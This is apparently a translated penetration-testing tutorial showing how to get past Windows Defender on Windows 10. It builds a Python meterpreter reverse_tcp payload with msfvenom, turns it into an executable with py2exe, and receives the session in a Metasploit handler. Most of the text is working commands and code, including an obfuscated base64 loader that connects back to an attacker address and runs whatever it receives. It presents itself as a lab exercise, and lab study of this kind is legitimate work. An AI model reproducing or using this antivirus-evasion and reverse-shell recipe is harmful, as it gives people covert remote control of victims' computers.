Bypassing Windows Defender cheap and cheerful: meterpreter session through python

Hello. Today we consider the option of running the meterpreter session on a Windows 10 machine with the latest patches (including Windows Defender). And we will also bypass antivirus software. Meterpreter - advanced multi-functional stuffing (payload, load), which can be dynamically expanded at run time. Under normal conditions, this provides you with a basic shell and allows you to add new features to it as needed.
We will do this with the help of Python, and see how antivirus tools behave.

Anticipating the question "Do we need Python on the victim's machine to run ex?", I will answer right away - no, not needed, everything is already inside.

In this article we will use:

• Windows 10 with Windows Defender turned on with updated databases (victim's computer 192.168.1.113);
• Kali linux for using metasploit and msfvenom (192.168.1.126);
• Windows 10 for building a binary (in our laboratory coincides with the victim's computer) with installed ones;
• Python (3, but also for 2 we'll see);
• py2exe .

To begin with, we denote the problem: we will create an exe file with a standard load, copy it onto the victim's machine and see what it will lead to.
')

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f exe > hunt.exe 

We get a warning from our old friend, Windows Defender, whom we all love so much.


If we ask VirusTotal, he will say the following:



Let's run Python and do something for which we are all gathered here.

Python / meterpreter / reverse_tcp is a unique cross-platform payload Metasploit Framework that allows you to remotely manage a compromised computer. No need to think about which platform to choose, it will work on any, but in this case we will make an executable file from it under Windows.

First, install the py2exe package, which allows you to make a Windows executable from the Python script.

We will have Python 3.4 (all that is higher - does not support py2exe).

 py -3.4 –m pip install py2exe 

or

 pip install py2exe 

Next, create a "raw" Python code with the extension .py

 msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f raw > hunt.py 

Also in the output of msfvenom we need to add a getpass import, which it forgets to do itself. As a result, it should turn out like this:

 import getpass,base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMjYnLDkwMDEpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'))) 

Now we are ready to create a binary.

 python34 -m py2exe.build_exe hunt.py --bundle-files 0 

Should get the following:



Let's turn to VirusTotal again:



Already better, now let's check it in action - after copying to the victim's machine, we manage without alerts.

In parallel, we will run our msf and handler for python by running sequentially the commands:

 msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set lhost 192.168.1.126 set lport 9001 run 

Go ahead and make sure the session works correctly.



Thus, the session started and Windows Defender did not work, which is what we wanted.

At the same time, let's consider what to do if you have Python version 2.

1. Swing py2exe for python 2
2. We generate payload with the .py extension
3. Create a setup.py file and write the following there:
   
   

    from distutils.core import setup import py2exe setup( name = 'Meter', description = 'Python-based App', version = '1.0', console=['hunt.py'], options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}}, zipfile = None, ) 

4.  python.exe .\setup.py py2exe 

It should all be the same.

As a result, I note that the python meterpreter shell is inferior in functionality to the more familiar windows meterpreter. For example, you will not be able to migrate to the process or use commands like getsystem, but still this is a real alternative: get a session to work with msf (routing and portfwd at least) and then work inside the network.